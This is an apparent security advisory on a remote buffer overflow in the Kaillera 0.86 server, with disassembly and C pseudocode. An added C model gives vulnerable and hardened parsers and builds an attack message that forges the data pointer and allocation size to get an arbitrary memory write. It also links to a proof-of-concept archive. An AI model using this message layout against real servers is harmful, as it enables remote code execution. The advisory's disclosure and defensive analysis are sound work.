Possible code execution in Kaillera 0.86
#######################################################################
Luigi Auriemma
Application: Kaillera
http://www.kaillera.com
Versions: <= 0.86
Platforms: Windows, Linux and FreeBSD
Bug: buffer-overflow
Exploitation: remote, versus server
Date: 06 Jul 2006
Author: Luigi Auriemma
e-mail: aluigi@xxxxxxxxxxxxx
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Kaillera is a middleware that adds network play to emulators such as
MAME, MameLang32+, Bliss, NESten, Jnes, Nemu64, Modeler, Gens, WinUAE,
PCAE, Kawaks and possibly others.
Although the latest version of the server was released over four years
ago, it is still widely used, as the online server lists show.
#######################################################################
======
2) Bug
======
Almost all Kaillera messages are handled by first reading a NUL
terminated string and then reading the remaining data of the message
(its content is parsed in a later step).
For these operations Kaillera uses a static buffer of 32 bytes and a
data buffer that is reallocated every time the size of the client
message exceeds the currently allocated size of that buffer.
The instructions handling these messages start at about offset 004019f1
in the Windows server 0.86:
004019F1 |. 33C9 XOR ECX,ECX
004019F3 |. 8A06 MOV AL,BYTE PTR DS:[ESI]
004019F5 |. 57 PUSH EDI
004019F6 |. 84C0 TEST AL,AL
004019F8 |. 74 0C JE SHORT KAILLERA.00401A06
004019FA |> 46 /INC ESI
004019FB |. 88440B 04 |MOV BYTE PTR DS:[EBX+ECX+4],AL
004019FF |. 41 |INC ECX
00401A00 |. 8A06 |MOV AL,BYTE PTR DS:[ESI]
00401A02 |. 84C0 |TEST AL,AL
00401A04 |.^75 F4 \JNZ SHORT KAILLERA.004019FA
00401A06 |> 8B6C24 18 MOV EBP,DWORD PTR SS:[ESP+18]
00401A0A |. C64419 04 00 MOV BYTE PTR DS:[ECX+EBX+4],0
00401A0F |. 2BE9 SUB EBP,ECX
00401A11 |. 8BCB MOV ECX,EBX
00401A13 |. 83ED 02 SUB EBP,2
00401A16 |. 55 PUSH EBP
00401A17 |. E8 D4FCFFFF CALL KAILLERA.004016F0
00401A1C |. 8B7B 24 MOV EDI,DWORD PTR DS:[EBX+24]
00401A1F |. 8BCD MOV ECX,EBP
00401A21 |. 8BD1 MOV EDX,ECX
00401A23 |. 46 INC ESI
00401A24 |. C1E9 02 SHR ECX,2
00401A27 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
which translates (more or less) to the following C code, where grow_data
stands for the routine at offset 004016f0:
  static char nick[32];          /* fixed 32-byte buffer for the first string */
  static char *data;             /* data buffer pointer, stored right after nick */
  static int  data_alloc_size;   /* allocated size of data, stored after the pointer */
  ...
  int nick_size,
      data_size;

  /* copies up to the first NUL with no check against sizeof(nick) */
  for(nick_size = 0; *client_msg; nick_size++, client_msg++) {
      nick[nick_size] = *client_msg;
  }
  nick[nick_size] = 0;
  client_msg++;                  /* skip the terminator */
  data_size = (client_msg_size - nick_size) - 2;
  grow_data(data_size);          /* function at offset 004016f0: realloc data if needed */
  memcpy(data, client_msg, data_size);
  ...
  /* function at offset 004016f0: trusts the stored allocated size and
     doubles it until the request fits before reallocating */
  void grow_data(int size) {
      if(size <= data_alloc_size) return;
      do {
          data_alloc_size <<= 1;
      } while(size > data_alloc_size);
      data = realloc(data, data_alloc_size);
  }
If an attacker uses a nickname longer than 32 bytes, the copy runs past
the static buffer and overwrites the two values stored right after it:
the address of the data buffer and its currently allocated size. The
following scheme shows that piece of memory:
  ooooooooooooooooooooooooooooooooXXXXYYYY
  |                               |   |
  |                               |   amount of data currently allocated
  |                               pointer to the data buffer
  static buffer of 32 bytes
By overwriting YYYY with a large value we pass the first check in the
function at offset 004016f0 (size <= data_alloc_size), so the buffer is
never reallocated; since the address XXXX is under our control as well,
the following memcpy writes the rest of our message to an address of our
choice in the server's memory. Because the copy loop stops at the first
NUL, the values written over XXXX and YYYY must not contain zero bytes.
This arbitrary write makes the execution of malicious code possible.
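The handler modelled in C, as an added example that is neither the server's code nor the author's proof of concept: vuln_parse reproduces the unbounded copy from the disassembly against a flat byte model of the client object (nick at +0, data pointer at +32, allocated size at +36, as in the scheme above), and safe_parse is a hardened variant that checks every length against the message. Assumptions not stated in the advisory: a one-byte message type precedes the string (which accounts for the "- 2" in the size arithmetic), the model addresses 0x00410000 and 0x00420000, and the two constructed messages; the model only records where the memcpy would write instead of performing it.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Client object as a flat byte array, laid out as the disassembly shows: 32-byte
 * nick, 4-byte data pointer, 4-byte allocated size (32-bit little-endian target),
 * plus slack so the constructed overflow stays inside the array. Nothing here is
 * dereferenced: the model records where the memcpy would write. */
#define NICK_SIZE   32
#define OFF_DATAPTR 32
#define OFF_ALLOC   36
#define OBJ_SIZE    64
typedef struct { unsigned char mem[OBJ_SIZE]; } client_obj;
typedef struct {
    int      rejected;       /* hardened parser refused the message */
    int      realloc_done;   /* the routine at 004016f0 resized the buffer */
    uint32_t dest;           /* address the data memcpy would write to */
    int      data_size;      /* length of that memcpy */
} parse_result;
static uint32_t rd32(const unsigned char *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     wr32(unsigned char *p, uint32_t v) { memcpy(p, &v, 4); }

static void init_obj(client_obj *o)
{
    memset(o, 0, sizeof *o);
    wr32(&o->mem[OFF_DATAPTR], 0x00410000u);  /* model heap address of data (assumed) */
    wr32(&o->mem[OFF_ALLOC],   0x100u);       /* 256 bytes currently allocated */
}

/* Growth check as at 004016f0: the only thing it trusts is the recorded size. */
static int grow_data(client_obj *o, int size)
{
    int32_t alloc = (int32_t)rd32(&o->mem[OFF_ALLOC]);
    if (size <= alloc) return 0;              /* a forged huge YYYY always ends here */
    do { alloc <<= 1; } while (size > alloc);
    wr32(&o->mem[OFF_ALLOC], (uint32_t)alloc);
    wr32(&o->mem[OFF_DATAPTR], 0x00420000u);  /* model: realloc moved the buffer */
    return 1;
}

/* Vulnerable handler: the loop at 004019FA stops only at the first NUL. */
static parse_result vuln_parse(client_obj *o, const unsigned char *msg, int msg_len)
{
    parse_result r = {0};
    const unsigned char *p = msg + 1;         /* assumed one-byte type prefix */
    int nick_size = 0;
    while (*p) {
        assert(nick_size < OBJ_SIZE - 1);     /* model guard only; the server has none */
        o->mem[nick_size++] = *p++;           /* bytes 32..39 land on XXXX and YYYY */
    }
    o->mem[nick_size] = 0;  p++;
    r.data_size    = (msg_len - nick_size) - 2;
    r.realloc_done = grow_data(o, r.data_size);
    r.dest         = rd32(&o->mem[OFF_DATAPTR]);  /* memcpy(dest, p, data_size) would follow */
    return r;
}

/* Hardened handler: every length is derived from and checked against msg_len. */
static parse_result safe_parse(client_obj *o, const unsigned char *msg, int msg_len)
{
    parse_result r = { .rejected = 1 };
    if (msg_len < 2) return r;
    const unsigned char *nick = msg + 1;
    const unsigned char *nul  = memchr(nick, 0, (size_t)(msg_len - 1));
    if (nul == NULL) return r;                /* nick not terminated inside the message */
    size_t nick_size = (size_t)(nul - nick);
    if (nick_size >= NICK_SIZE) return r;     /* leave room for the terminator */
    int data_size = msg_len - (int)nick_size - 2;
    if (data_size < 0) return r;
    memcpy(o->mem, nick, nick_size);
    o->mem[nick_size] = 0;
    r.rejected = 0;  r.data_size = data_size;
    r.realloc_done = grow_data(o, data_size);
    r.dest         = rd32(&o->mem[OFF_DATAPTR]);
    return r;
}

/* Constructed messages. Benign: type byte, "player", NUL, five data bytes. Attack:
 * 32 filler bytes, then XXXX = 0x40302010 and YYYY = 0x7fffffff; neither value may
 * contain a zero byte or the copy loop would stop early. */
static const unsigned char benign_msg[] = { 0x03, 'p','l','a','y','e','r', 0, 1,2,3,4,5 };
static unsigned char attack_msg[1 + NICK_SIZE + 8 + 1 + 4];
static void build_attack(void)
{
    unsigned char *p = attack_msg;
    *p++ = 0x03;
    memset(p, 'A', NICK_SIZE); p += NICK_SIZE;
    wr32(p, 0x40302010u); p += 4;             /* new data pointer: memcpy target */
    wr32(p, 0x7fffffffu); p += 4;             /* new allocated size: skips realloc */
    *p++ = 0;
    memcpy(p, "\xcc\xcc\xcc\xcc", 4);         /* payload that would land at 0x40302010 */
}

static parse_result run_vuln_benign(void) { client_obj o; init_obj(&o); return vuln_parse(&o, benign_msg, (int)sizeof benign_msg); }
static parse_result run_vuln_attack(void) { client_obj o; init_obj(&o); build_attack(); return vuln_parse(&o, attack_msg, (int)sizeof attack_msg); }
static parse_result run_safe_benign(void) { client_obj o; init_obj(&o); return safe_parse(&o, benign_msg, (int)sizeof benign_msg); }
static parse_result run_safe_attack(void) { client_obj o; init_obj(&o); build_attack(); return safe_parse(&o, attack_msg, (int)sizeof attack_msg); }
```

With the attack message, run_vuln_attack reports a 4-byte memcpy to 0x40302010 with no realloc: the forged size passes the check at 004016f0 and the forged pointer becomes the destination, which is the write-what-where the advisory describes. run_safe_attack rejects the same message because the nick (40 bytes) does not fit the 32-byte buffer, while both variants handle the benign message identically.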
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/kailleraex.zip
#######################################################################
======
4) Fix
======
The developers will release a new version soon
#######################################################################
---
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org